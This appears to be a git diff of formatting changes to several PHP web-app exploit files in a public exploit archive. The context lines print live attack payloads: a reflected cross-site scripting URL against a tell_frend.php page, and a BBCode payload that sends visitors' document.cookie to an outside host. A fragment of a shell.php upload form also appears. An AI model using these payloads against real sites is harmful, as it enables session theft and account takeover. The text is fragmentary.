100755 --- a/platforms/php/webapps/10419.txt +++ b/platforms/php/webapps/10419.txt @@ -45,7 +45,7 @@ This exploit will change this info for every user that opens it and is logged in - + + alert(213771818860)%3B +http://server/tell_frend.php?name=indoushka&email=indoushka%40hotmaill%2Ecom&name1=tchalla06@yahoo.fr&email1=Hussin-x&submitok=1&link=</textarea>alert(213771818860)%3B ================================ Dz-Ghost Team ======================================== diff --git a/platforms/php/webapps/1106.txt b/platforms/php/webapps/1106.txt index 6687739fd..1abbfcf5d 100755 --- a/platforms/php/webapps/1106.txt +++ b/platforms/php/webapps/1106.txt @@ -8,6 +8,6 @@ Credits to Nick Griffin. */ [color=#EFEFEF][url]www.ut[url=http://www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.milw0rm.com/cgi-bin/shell.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] - - -# milw0rm.com [2005-07-14] + + +# milw0rm.com [2005-07-14] diff --git a/platforms/php/webapps/1142.php b/platforms/php/webapps/1142.php index 77b24979a..b896eb2ab 100755 --- a/platforms/php/webapps/1142.php +++ b/platforms/php/webapps/1142.php @@ -60,6 +60,6 @@ echo $r; -?> - -// milw0rm.com [2005-08-09] +?> + +// milw0rm.com [2005-08-09] diff --git a/platforms/php/webapps/12811.txt b/platforms/php/webapps/12811.txt index 64141976a..fb919af8c 100755 --- a/platforms/php/webapps/12811.txt +++ b/platforms/php/webapps/12811.txt @@ -1,5 +1,4 @@ - ______ _ _ _ | ___ \ | | | | (_) | |_/ /_____ _____ | |_ _| |_ _ ___ _ __ @@ -43,7 +42,7 @@ _____________________________________________________________
FILE NAME:
  (ex. shell.php)
FILE CONTENTS:
- +